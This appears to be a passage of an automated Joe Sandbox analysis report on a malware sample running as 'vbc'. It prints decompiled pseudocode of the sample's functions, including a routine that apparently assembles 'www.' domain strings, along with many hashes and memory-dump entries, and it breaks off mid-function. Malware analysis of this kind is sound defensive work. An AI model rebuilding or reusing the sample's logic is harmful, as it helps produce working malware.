                                                    • API String ID: 621844428-0
                                                    • Opcode ID: f68a12b1ae08bc18d2daaa53a8749b1a1e7c0694c607ca03d50669b30071d059
                                                    • Instruction ID: 566a17abb27ea258133f2eb49586a29f50253f7432eb50924bb539fdf443aa0a
                                                    • Opcode Fuzzy Hash: f68a12b1ae08bc18d2daaa53a8749b1a1e7c0694c607ca03d50669b30071d059
                                                    • Instruction Fuzzy Hash: 2EE046B1A00254BBD620DB988C99FC73BA89F48640F1185A8BD496B292C571EA0586A4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00418940(intOrPtr _a4, int _a8) {
                                                    				void* _t10;
                                                    
                                                    				_t5 = _a4;
                                                    				E004191F0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                    				ExitProcess(_a8);
                                                    			}

                                                    APIs
                                                    • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418968
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                    • Instruction ID: 1333b191b135ec901ac61a9cb59cf638980f097d56b5f16c626c7f81ecdb5f9b
                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                    • Instruction Fuzzy Hash: 52D012716002187BD620DF99CC85FD7779CDF48750F018065BA1C5B242C531BA00C6E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    C-Code - Quality: 89%
                                                    			E004162F6(char __eax, void* __edi) {
                                                    				signed char _t122;
                                                    				signed char _t126;
                                                    				void* _t129;
                                                    				signed int _t134;
                                                    				void* _t138;
                                                    				void* _t146;
                                                    				intOrPtr _t149;
                                                    				void* _t153;
                                                    				intOrPtr _t190;
                                                    				char _t194;
                                                    				void* _t220;
                                                    				void* _t249;
                                                    				char _t252;
                                                    				intOrPtr _t253;
                                                    				void* _t256;
                                                    				void* _t259;
                                                    				void* _t262;
                                                    
                                                    				_t119 = __eax;
                                                    				if(__edi != 1) {
                                                    					while(1) {
                                                    						L7:
                                                    						__eflags = _t119;
                                                    						if(_t119 != 0) {
                                                    							 *((char*)(_t256 + _t252 - 0x10)) = _t119;
                                                    							_t252 = _t252 + 1;
                                                    							__eflags = _t252;
                                                    						}
                                                    						while(1) {
                                                    							L9:
                                                    							__eflags = _t252 - 8;
                                                    							if(__eflags >= 0) {
                                                    								break;
                                                    							}
                                                    							_push(0x92);
                                                    							 *((intOrPtr*)(_t220 + 0x53)) =  *((intOrPtr*)(_t220 + 0x53)) + _t194;
                                                    							_t119 = E004092B0(__eflags);
                                                    							_t259 = _t259 + 8;
                                                    							_t194 = 0;
                                                    							__eflags = 0;
                                                    							while(1) {
                                                    								__eflags = _t119 -  *((intOrPtr*)(_t256 + _t194 - 0x10));
                                                    								if(_t119 ==  *((intOrPtr*)(_t256 + _t194 - 0x10))) {
                                                    									goto L9;
                                                    								}
                                                    								_t194 = _t194 + 1;
                                                    								__eflags = _t194 - _t252;
                                                    								if(_t194 <= _t252) {
                                                    									continue;
                                                    								} else {
                                                    									goto L7;
                                                    								}
                                                    								goto L9;
                                                    							}
                                                    						}
                                                    						_t7 = _t256 - 0x97; // 0x71f7e8fe
                                                    						 *((intOrPtr*)(_t256 - 8)) = 0x2e777777;
                                                    						 *((char*)(_t256 - 4)) = 0;
                                                    						 *((short*)(_t256 - 3)) = 0;
                                                    						 *((char*)(_t256 - 1)) = 0;
                                                    						 *((char*)(_t256 - 0x98)) = 0;
                                                    						E0041A160(_t7, 0, 0x3f);
                                                    						_t122 = E004092B0(__eflags, 2, 5);
                                                    						_t13 = _t256 - 0x98; // 0x71f7e8fd
                                                    						E0041AA50(_t13, _t122 & 0x000000ff);
                                                    						_t14 = _t256 - 0x98; // 0x71f7e8fd
                                                    						 *((char*)(_t256 + E0041A3B0(_t14) - 0x98)) = 0x3d;
                                                    						_t126 = E004092B0(__eflags, 4, 0x10);
                                                    						_t17 = _t256 - 0x98; // 0x71f7e8fd
                                                    						_t19 = E0041A3B0(_t17) - 0x98; // 0x71f7e8fd
                                                    						_t129 = E0041AA50(_t256 + _t19, _t126 & 0x000000ff);
                                                    						_t20 = _t256 + 8; // 0x2e777777
                                                    						_t253 =  *_t20;
                                                    						_t190 = 0;
                                                    						_t262 = _t259 + 0x34;
                                                    						 *((intOrPtr*)(_t256 - 0x14)) = 0;
                                                    						_t249 = 0;
                                                    						do {
                                                    							__eflags =  *((intOrPtr*)(_t253 + 0x1170)) - _t190;
                                                    							if( *((intOrPtr*)(_t253 + 0x1170)) != _t190) {
                                                    								_t23 = _t256 - 0x58; // 0x71f7e93d
                                                    								E0041A110(_t23, 0x2e);
                                                    								_t24 = _t256 - 0x306; // 0x71f7e68f
                                                    								 *((short*)(_t256 - 0x308)) = 0;
                                                    								E0041A160(_t24, 0, 0x206);
                                                    								E0041A110( *((intOrPtr*)(_t253 + 0x14a4)) + _t249, 0x388);
                                                    								_t134 = E0041A6D0();
                                                    								_t28 = _t190 - 1; // -1
                                                    								 *( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x40) = _t134 * _t28 & 0x00000001;
                                                    								_t31 = _t256 - 0x98; // 0x71f7e8fd
                                                    								_t138 = E0041A3B0(_t31);
                                                    								_t33 = _t256 - 0x98; // 0x71f7e8fd
                                                    								E0041A0E0( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x87, _t33, _t138);
                                                    								_t36 = _t256 - 8; // 0x2e777777
                                                    								_t37 = _t256 - 0x58; // 0x71f7e93d
                                                    								E0041A0E0(_t37, _t36, 4);
                                                    								_t40 = _t256 - 0x58; // 0x71f7e93d
                                                    								_t42 = E0041A3B0(_t40) - 0x58; // 0x71f7e93d
                                                    								E00409E10(_t190, _t253, __eflags, _t253, _t256 + _t42,  *(_t256 + _t190 - 0x10) & 0x000000ff);
                                                    								_t43 = _t256 - 0x58; // 0x71f7e93d
                                                    								_t146 = E0041A3B0(_t43);
                                                    								_t45 = _t256 - 0x58; // 0x71f7e93d
                                                    								E0041A0E0( *((intOrPtr*)(_t253 + 0x14a4)) + _t249, _t45, _t146);
                                                    								_t46 = _t256 - 0x58; // 0x71f7e93d
                                                    								_t149 = E0041A3B0(_t46);
                                                    								_t192 = _t253 + 0xe90;
                                                    								_t48 = _t256 - 0x58; // 0x71f7e93d
                                                    								 *((intOrPtr*)(_t256 - 0x18)) = _t149;
                                                    								E0041A4E0(_t48, _t253 + 0xe90, 0);
                                                    								_t50 = _t256 - 0x100; // 0x71f7e895
                                                    								E00408C50(_t50);
                                                    								_t51 = _t256 - 0x58; // 0x71f7e93d
                                                    								_t153 = E0041A3B0(_t51);
                                                    								_t52 = _t256 - 0x58; // 0x71f7e93d
                                                    								_t53 = _t256 - 0x100; // 0x71f7e895
                                                    								E004099D0(_t53, _t52, _t153);
                                                    								_t54 = _t256 - 0x100; // 0x71f7e895
                                                    								E004099A0(_t54);
                                                    								_t56 = _t256 - 0x100; // 0x71f7e895
                                                    								E0041A0E0( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x72, _t56, 0x14);
                                                    								 *((char*)(_t256 +  *((intOrPtr*)(_t256 - 0x18)) - 0x58)) = 0;
                                                    								_t63 = _t256 - 0x308; // 0x71f7e68d
                                                    								 *((intOrPtr*)( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x4c)) = 2;
                                                    								 *((intOrPtr*)( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x50)) = 1;
                                                    								E00409EA0(_t253 + 0xe90, _t253, _t253, _t63, 0x46, 1, 4);
                                                    								_t70 = _t256 - 0x308; // 0x71f7e68d
                                                    								E0041A780( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0xc7, _t70);
                                                    								_push(1);
                                                    								_t73 = _t256 - 0x308; // 0x71f7e68d
                                                    								E00409EA0(_t253 + 0xe90, _t253);
                                                    								_t75 = _t256 - 0x308; // 0x71f7e68d
                                                    								E0041A780(E0041A3B0( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0xc7) +  *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0xc7, _t75);
                                                    								_t82 = _t256 - 0x58; // 0x71f7e93d
                                                    								E0041A4E0( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0xc7, _t82, 0);
                                                    								_t85 = _t256 - 0x308; // 0x71f7e68d
                                                    								E00409EA0(_t192, _t253, _t253, _t85, 0x4a, 1, _t253);
                                                    								_t87 = _t256 - 0x308; // 0x71f7e68d
                                                    								E0041A780( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x167, _t87);
                                                    								_t90 = _t256 - 0x308; // 0x71f7e68d
                                                    								E00409EA0(_t192, _t253, _t253, _t90, 0x4b, 1, _t73);
                                                    								_t92 = _t256 - 0x308; // 0x71f7e68d
                                                    								E0041A780(E0041A3B0( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x167) +  *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x167, _t92);
                                                    								_t99 = _t256 - 0x58; // 0x71f7e93d
                                                    								E0041A4E0( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x167, _t99, 0);
                                                    								_t102 = _t256 - 0x308; // 0x71f7e68d
                                                    								E00409EA0(_t192, _t253, _t253, _t102, 0x4f, 1, 0x47);
                                                    								_t104 = _t256 - 0x308; // 0x71f7e68d
                                                    								__eflags = E0041A3B0( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x287) +  *((intOrPtr*)(_t253 + 0x14a4));
                                                    								E0041A780(E0041A3B0( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x287) +  *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x287, _t104);
                                                    								_t111 = _t256 - 0x58; // 0x71f7e93d
                                                    								E0041A4E0( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x287, _t111, 0);
                                                    								_t129 = E0041A4E0( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x287, _t192, 0);
                                                    								_t190 =  *((intOrPtr*)(_t256 - 0x14));
                                                    								_t262 = _t262 + 0x144;
                                                    							}
                                                    							_t190 = _t190 + 1;
                                                    							_t249 = _t249 + 0x388;
                                                    							 *((intOrPtr*)(_t256 - 0x14)) = _t190;
                                                    							__eflags = _t249 - 0x1c40;
                                                    						} while (_t249 < 0x1c40);
                                                    						return _t129;
                                                    						goto L15;
                                                    					}
                                                    				} else {
                                                    					return __eax;
                                                    				}
                                                    				L15:
                                                    			}
                                                    0x004162f6
                                                    0x004162f7
                                                    0x0041635e
                                                    0x0041635e
                                                    0x0041635e
                                                    0x00416360
                                                    0x00416362
                                                    0x00416366
                                                    0x00416366
                                                    0x00416366
                                                    0x00416367
                                                    0x00416367
                                                    0x00416367
                                                    0x0041636a
                                                    0x00000000
                                                    0x00000000
                                                    0x00416342
                                                    0x00416346
                                                    0x00416349
                                                    0x0041634e
                                                    0x00416351
                                                    0x00416351
                                                    0x00416353
                                                    0x00416353
                                                    0x00416357
                                                    0x00000000
                                                    0x00000000
                                                    0x00416359
                                                    0x0041635a
                                                    0x0041635c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0041635c
                                                    0x00416353
                                                    0x00416371
                                                    0x00416378
                                                    0x0041637f
                                                    0x00416383
                                                    0x00416387
                                                    0x0041638a
                                                    0x00416390
                                                    0x00416399
                                                    0x004163a2
                                                    0x004163a9
                                                    0x004163ae
                                                    0x004163be
                                                    0x004163c6
                                                    0x004163d2
                                                    0x004163de
                                                    0x004163e9
                                                    0x004163ee
                                                    0x004163ee
                                                    0x004163f1
                                                    0x004163f3
                                                    0x004163f6
                                                    0x004163f9
                                                    0x00416400
                                                    0x00416400
                                                    0x00416406
                                                    0x0041640c
                                                    0x00416412
                                                    0x0041641f
                                                    0x00416426
                                                    0x0041642d
                                                    0x00416440
                                                    0x00416445
                                                    0x00416450
                                                    0x00416459
                                                    0x0041645d
                                                    0x00416464
                                                    0x00416470
                                                    0x0041647f
                                                    0x00416486
                                                    0x0041648a
                                                    0x0041648e
                                                    0x0041649e
                                                    0x004164aa
                                                    0x004164b0
                                                    0x004164b5
                                                    0x004164b9
                                                    0x004164c5
                                                    0x004164cc
                                                    0x004164d1
                                                    0x004164d5
                                                    0x004164dc
                                                    0x004164e2
                                                    0x004164e7
                                                    0x004164ea
                                                    0x004164ef
                                                    0x004164f6
                                                    0x004164fb
                                                    0x004164ff
                                                    0x00416505
                                                    0x00416509
                                                    0x00416510
                                                    0x00416515
                                                    0x0041651f
                                                    0x0041652c
                                                    0x00416538
                                                    0x00416546
                                                    0x0041654f
                                                    0x00416555
                                                    0x00416565
                                                    0x0041656d
                                                    0x00416578
                                                    0x00416587
                                                    0x0041658c
                                                    0x00416590
                                                    0x00416598
                                                    0x004165a6
                                                    0x004165cb
                                                    0x004165d8
                                                    0x004165e4
                                                    0x004165ed
                                                    0x004165f5
                                                    0x00416600
                                                    0x0041660f
                                                    0x00416618
                                                    0x00416620
                                                    0x0041662e
                                                    0x00416653
                                                    0x00416660
                                                    0x0041666c
                                                    0x00416675
                                                    0x0041667d
                                                    0x0041668b
                                                    0x0041669f
                                                    0x004166b0
                                                    0x004166bd
                                                    0x004166c9
                                                    0x004166df
                                                    0x004166e4
                                                    0x004166e7
                                                    0x004166e7
                                                    0x004166ea
                                                    0x004166eb
                                                    0x004166f1
                                                    0x004166f4
                                                    0x004166f4
                                                    0x00416706
                                                    0x00000000
                                                    0x00416706
                                                    0x004162fd
                                                    0x00416303
                                                    0x00416303
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: =$www.$www.
                                                    • API String ID: 0-3343787489
                                                    • Opcode ID: 8a69f24caac826e16a5dad2e681daa35f24bcc84a2534cafaee34269a6a1ef26
                                                    • Instruction ID: 4370f1302d9e974ba5174e44d7d420472bb9dad722ef38a7a88f5ffe9938ecc1
                                                    • Opcode Fuzzy Hash: 8a69f24caac826e16a5dad2e681daa35f24bcc84a2534cafaee34269a6a1ef26
                                                    • Instruction Fuzzy Hash: 18A1DA71941204ABCB15DBB0CC82FDFB37DAF44318F04455EB6195B183DA78B688CBAA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                    • Instruction ID: 8c3b17126ed05b853d4837bf5130337b9cb480e39abc1a221889cc0800f61d9c
                                                    • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                    • Instruction Fuzzy Hash: 70F0C22132855DDBDB48FA789D6177A73D5FB94300F54C039EE49C7241E631DD408691
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0d2fcd2084ff59ff0b3a78e82aba096856c42f6942f1665d61836ef2847a7e3f
                                                    • Instruction ID: a80ae7c34a1b69a87fc567a5d567371f1e6a51223c7e289b2f93a660786dfecd
                                                    • Opcode Fuzzy Hash: 0d2fcd2084ff59ff0b3a78e82aba096856c42f6942f1665d61836ef2847a7e3f
                                                    • Instruction Fuzzy Hash: 5DB0922AB8E25539912658993C508F8EFA88083075E202677E609F75928202D225829D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                    • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                    • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                    • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                    • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                    • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                    • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                    • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                    • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                    • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                    • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                    • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                    • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                    • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                    • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                    • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                    • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                    • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                    • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                    • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                    • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                    • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                    • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                    • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                    • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 94%
                                                    			E00908788(signed int __ecx, void* __edx, signed int _a4) {
                                                    				signed int _v8;
                                                    				short* _v12;
                                                    				void* _v16;
                                                    				signed int _v20;
                                                    				char _v24;
                                                    				signed int _v28;
                                                    				signed int _v32;
                                                    				char _v36;
                                                    				signed int _v40;
                                                    				char _v44;
                                                    				signed int _v48;
                                                    				signed int _v52;
                                                    				signed int _v56;
                                                    				signed int _v60;
                                                    				char _v68;
                                                    				void* _t216;
